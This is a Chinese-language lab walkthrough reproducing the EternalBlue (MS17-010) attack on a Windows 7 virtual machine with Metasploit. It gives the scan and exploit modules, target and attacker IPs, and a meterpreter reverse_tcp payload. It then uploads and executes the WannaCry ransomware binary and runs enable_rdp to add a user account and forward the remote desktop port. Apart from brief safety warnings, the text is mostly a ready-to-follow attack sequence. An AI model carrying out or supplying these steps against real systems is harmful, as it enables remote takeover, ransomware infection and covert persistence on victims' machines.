永恒之蓝利用Windows系统的SMB漏洞可以获取系统的最高权限,然后通过恶意代码扫描开放445端口的Windows系统;只要是被扫描到的Windows系统,只要开机上线,不需要用户进行任何操作,即可通过共享漏洞上传wannacry勒索病毒,远程控制木马等恶意程序。
在复现过程中需要先做好防护,以免造成真机感染病毒,那就GG了 先将共享文件夹给禁用掉,为了以防万一这里再把真机的入站规则改一下,阻止445端口连接
WannaCry是在永恒之蓝的基础上产生的,因此需要先通过永恒之蓝获得shell权限。
永恒之蓝的编号是MS17-010,先使用msfconsole搜索一下漏洞模块
search ms17-010这里先使用下
auxiliary/scanner/smb/smb_ms17_010这个作为搜索模块对靶机进行漏洞扫描 发现存在漏洞(注意在虚拟机中win7靶机需要关闭防火墙才可以发现),既然有漏洞那下面就使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue设置一下靶机的IP地址
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.186.131再设置下攻击的payload,这里选择
windows/x64/meterpreter/reverse_tcp最后再设置一下攻击机的IP即可
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.186.134进行攻击
exploit攻击成功,将我们前面准备好的WannaCry病毒上传进去对方的主机中
upload /tmp/wcry.exe c://进入shell权限,dir一下,发现上传成功 执行病毒即可
c:\>wcry.exe接下来使用一下enable_rdp 脚本来开启远程桌面
run post/windows/manage/enable_rdp #开启远程桌面 run post/windows/manage/enable_rdp USERNAME=shy2 PASSWORD=123456 #添加用户 run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662远程桌面连接Win7
rdesktop 192.168.190.131:3389复现成功
复现该病毒时一定要注意做好防护,这类病毒的传播性很强切勿用于恶作剧,切记切记!
